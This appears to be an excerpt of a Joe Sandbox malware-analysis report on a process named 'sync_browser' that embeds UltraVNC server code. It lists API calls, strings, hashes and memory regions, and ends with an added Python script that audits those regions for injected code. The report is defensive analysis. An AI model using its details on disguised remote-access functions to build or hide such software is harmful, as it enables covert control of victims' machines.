                                                                      • API String ID: 421869683-3362258117
                                                                      • Opcode ID: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                      • Instruction ID: 99871ae38a3768fb056c536664c2d46ff533ad852bf7ac583b3e6e1fbc70c8fe
                                                                      • Opcode Fuzzy Hash: 3590b074e5f29d85f71debabe8de06fed850c3c5fd9db8f8af18c013e671a393
                                                                      • Instruction Fuzzy Hash: 9C519532A08B4985E714EF25B8603B9B7A4FB44B90F844236EA9D83A98DF3CE515C751
                                                                      APIs
                                                                      Strings
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7E5086A39
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7E50869F2
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7E50869A4
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF7E508695B
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7E5086A0B
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7E5086BB2
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                      • API String ID: 181403729-1081969236
                                                                      • Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                      • Instruction ID: a453874463346758b0a823c77c203f0a89409f27120919b59cb105a413a578ce
                                                                      • Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
                                                                      • Instruction Fuzzy Hash: E4613862A185D981F724AB25F4357B9B390EB50B44FC4503BF98ECB695EE3CD109C722
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: rand$Time_getptd$FileSystem
                                                                      • String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
                                                                      • API String ID: 3485648590-3000200491
                                                                      • Opcode ID: 11d72f19a25ca50024aca8e18d0a2dbf4c1a378a4239df8fbec8ef93dcbcf261
                                                                      • Instruction ID: bd094e726b3e559d368c4f9001416e2551cbac68dbbb6e6469d99949cd93dae3
                                                                      • Opcode Fuzzy Hash: 11d72f19a25ca50024aca8e18d0a2dbf4c1a378a4239df8fbec8ef93dcbcf261
                                                                      • Instruction Fuzzy Hash: 53F11952B193D94AEB10D7B964202FD6FA09B82B85F944077EE9D9BB8ADD3CD100C721
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
                                                                      • String ID: ($DISPLAY$\background.bmp
                                                                      • API String ID: 3125945695-1422902838
                                                                      • Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                      • Instruction ID: cad42ad438bbf11646b9be4f9fbaa51422f83ae4078c8567af31acd74653148d
                                                                      • Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
                                                                      • Instruction Fuzzy Hash: A7416A35708B8586E760AB24F46576BB3A0FF89B94FC01236DA9D83B98DF3CD0158B11
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: recv$send
                                                                      • String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
                                                                      • API String ID: 1963230611-4083095726
                                                                      • Opcode ID: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                      • Instruction ID: 069e16d1b3e8385e8cc743713fc058128ff7f399c3d2f8874560a62d9633cfa5
                                                                      • Opcode Fuzzy Hash: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                      • Instruction Fuzzy Hash: FBF1B421A0CB8A91E790B735A564379A791FB85F94FC44133EB4D83A99DE3CE542C322
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressCreateDisplayEnumFreeLoadProcSettings
                                                                      • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                                      • API String ID: 3702840025-1174184736
                                                                      • Opcode ID: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                                      • Instruction ID: 9e210c50128921aa1c94c48f159be8b43384a9e9e4f6eaca61b67faf586f22b0
                                                                      • Opcode Fuzzy Hash: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                                      • Instruction Fuzzy Hash: 4B31B8217096C695FB70EB25B865BAAB390FB89B44FC41136D98E87B48DF3CD105CB11
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
                                                                      • String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
                                                                      • API String ID: 771632046-3493897170
                                                                      • Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                      • Instruction ID: 73199f1f3a442eb15e06ae4160b570d9b2b0ef60c0f6c76382df09320cca94dd
                                                                      • Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
                                                                      • Instruction Fuzzy Hash: D9316535A1CA4AC2EB60EB24F4653AAB360FB89B54FC01137E64D82658DF3DE105CB51
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CloseHandleOpenToken$AdjustCurrentErrorLastLookupPrivilegePrivilegesValue
                                                                      • String ID: SeTcbPrivilege
                                                                      • API String ID: 2450735924-1502394177
                                                                      • Opcode ID: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                                      • Instruction ID: 882cbb8b3c2ed2b48f34ab6c6145b4e30f570bbb64050ef8714576b0cb49223b
                                                                      • Opcode Fuzzy Hash: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                                      • Instruction Fuzzy Hash: 07213561B18B8A82FB60AB61F42576AA3A0FF85F45F841036E94D87758EF7CD444CB11
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                                                      • String ID:
                                                                      • API String ID: 2532449802-0
                                                                      • Opcode ID: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                      • Instruction ID: 5ad80cc505e3af95db54ff16284329143261efd0e029e95cca61768f869de552
                                                                      • Opcode Fuzzy Hash: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                      • Instruction Fuzzy Hash: 94C1B436A0C28A85E720BF25B47177AB795BF45F40F804136DA8D8769ADF3CD8119722
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1457502553-0
                                                                      • Opcode ID: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                                      • Instruction ID: f83810da7a6facb86d7a8ed3778bfd61c5b89aa08717e0edc93f132950a10dbe
                                                                      • Opcode Fuzzy Hash: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                                      • Instruction Fuzzy Hash: EA91D8B2B0464E47EB58AF25E835779A3D5DB54B84F45803BDA0DCAB8DEE3CE5008711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressInfoProcSystem$Version
                                                                      • String ID: @$GetNativeSystemInfo$GetVersionExA
                                                                      • API String ID: 4103462327-1183986914
                                                                      • Opcode ID: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                                      • Instruction ID: a86950d4223de19a96fdae07440be024bd8a2ecd4d44b6e1bc25cd1fa1a89361
                                                                      • Opcode Fuzzy Hash: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                                      • Instruction Fuzzy Hash: 7DF17572A0468589E750EF35D0603BDB7A0FB45F48F588036EE4E8B699DF38E545CB22
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DesktopOpen$ClipboardCloseInput
                                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 2872304593-3977938048
                                                                      • Opcode ID: 9a1397a3eef0d020bab29e7c55029324bfbb077e343b79cf4d75e8f6a3a4f479
                                                                      • Instruction ID: b95db02468adea9fa1c137b09ce4165ad4a5a436fdf4d9cccc78ebab306bb48f
                                                                      • Opcode Fuzzy Hash: 9a1397a3eef0d020bab29e7c55029324bfbb077e343b79cf4d75e8f6a3a4f479
                                                                      • Instruction Fuzzy Hash: E512E632A086C585E760EB39C8687FDA7A0EBC5F94F844136EA4D8B799CF38D441C321
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfileQueryValue$FileModuleNameString
                                                                      • String ID: UseRegistry$admin$admin_auth
                                                                      • API String ID: 3374479654-3376419731
                                                                      • Opcode ID: f1da5f48a8e78eea85e5e4b18c7d496972abace380fcf9454b174fc3425995f0
                                                                      • Instruction ID: 8c73b3a24bf9548c7e44d6b5bd8606ec62fb4d27386d38361394197b26685dcd
                                                                      • Opcode Fuzzy Hash: f1da5f48a8e78eea85e5e4b18c7d496972abace380fcf9454b174fc3425995f0
                                                                      • Instruction Fuzzy Hash: 08316631618A4681EB61AB21F8647AAF364FB89F84FC41137E98D87B58DF3CD504CB11
                                                                      APIs
                                                                      Strings
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7E509166F
                                                                      • unable to determine legacy authentication method, xrefs: 00007FF7E509173F
                                                                      • i, xrefs: 00007FF7E5091809
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
                                                                      • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
                                                                      • API String ID: 2847437661-1576074771
                                                                      • Opcode ID: c943cd2ba047107cef663f8e316ffb6f847f0ddfb623d2f2043e74a738892daf
                                                                      • Instruction ID: 4d01dd7021978954a5cd0823bdfc8e6d8c91f2ab3eac797f2b4792a26656c74a
                                                                      • Opcode Fuzzy Hash: c943cd2ba047107cef663f8e316ffb6f847f0ddfb623d2f2043e74a738892daf
                                                                      • Instruction Fuzzy Hash: 36D1B422B0474685F714E739D4643BDA7A2EB85B64F944236EE2E877D9CF38D841C322
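The "Memory Dump Source" and "Associated" identifiers repeated in each function entry above encode the process and the memory regions the code was lifted from. The script below, added here as an example and not part of the Joe Sandbox report or its tooling, parses those identifiers into an image map and runs the two triage checks an analyst applies to such a region list: executable memory that is also writable, and executable memory that is not part of a mapped image. The field layout beyond PID, iteration and base address is an inference from the values on this page (PID 0x17 and iteration 2 agree with the snapshot name hcaresult_23_2_7ff7e5070000, and the fifth and seventh fields decode cleanly as the winnt.h PAGE_* and MEM_* constants), not a published specification; the remaining two fields are kept raw. The eleven identifiers are taken from the list above; the single RWX identifier is constructed to show what a finding looks like.

```python
"""Decode Joe Sandbox memory-dump identifiers into a PE image map and audit it.

Added example, not Joe Sandbox code. Assumed identifier layout (inferred from
the values in this report, not from a published specification):

    PID.ITER.TIMESTAMP.BASE.PROTECT.FLAGS.TYPE.INDEX.sdmp

PROTECT is decoded as the winnt.h PAGE_* constants and TYPE as the MEM_*
constants; FLAGS and INDEX are kept raw because their meaning is not
established here.
"""
import re
from dataclasses import dataclass

# winnt.h memory protection constants
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# winnt.h region types as reported by VirtualQuery
MEM_IMAGE = 0x1000000
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<iter>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<idx>[0-9A-Fa-f]{8})\.sdmp$"
)

# Image base of the module, from the "Offset:" value on the Source File line.
IMAGE_BASE = 0x7FF7E5070000

# The eleven region identifiers listed under "Memory Dump Source" in the report.
PAGE_REGIONS = [
    "00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp",
    "00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp",
]

# Constructed identifier (NOT from the report): a private RWX region in the same
# process, the shape that injected or freshly unpacked code typically has.
INJECTED_REGION = "00000017.00000002.3171300000.000001F4A0C10000.00000040.00000001.00020000.00000000.sdmp"


@dataclass(frozen=True)
class Region:
    pid: int
    iteration: int
    base: int
    protect: int
    flags: int
    mem_type: int
    index: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)  # READWRITE, WRITECOPY and their EXECUTE variants


def parse_sdmp(name: str) -> Region:
    """Parse one identifier; raise ValueError for anything that does not match."""
    m = SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError(f"not a Joe Sandbox memory-dump identifier: {name!r}")
    return Region(
        pid=int(m["pid"], 16), iteration=int(m["iter"], 16), base=int(m["base"], 16),
        protect=int(m["prot"], 16), flags=int(m["flags"], 16),
        mem_type=int(m["type"], 16), index=int(m["idx"], 16),
    )


def image_layout(regions, image_base):
    """(offset from image base, protection name, region type) sorted by address."""
    return [
        (r.base - image_base,
         PAGE_PROTECT.get(r.protect, f"{r.protect:#x}"),
         MEM_TYPE.get(r.mem_type, f"{r.mem_type:#x}"))
        for r in sorted(regions, key=lambda r: r.base)
    ]


def audit(regions):
    """Triage checks over a region list; an empty result means a clean image mapping."""
    findings = []
    pids = {r.pid for r in regions}
    if len(pids) > 1:
        findings.append(f"identifiers span several processes: {sorted(pids)}")
    for r in sorted(regions, key=lambda r: r.base):
        prot = PAGE_PROTECT.get(r.protect, f"{r.protect:#x}")
        kind = MEM_TYPE.get(r.mem_type, f"{r.mem_type:#x}")
        if r.executable and r.writable:
            findings.append(f"{r.base:#x}: writable and executable ({prot})")
        if r.executable and r.mem_type != MEM_IMAGE:
            findings.append(f"{r.base:#x}: executable code outside a mapped image ({kind})")
    return findings


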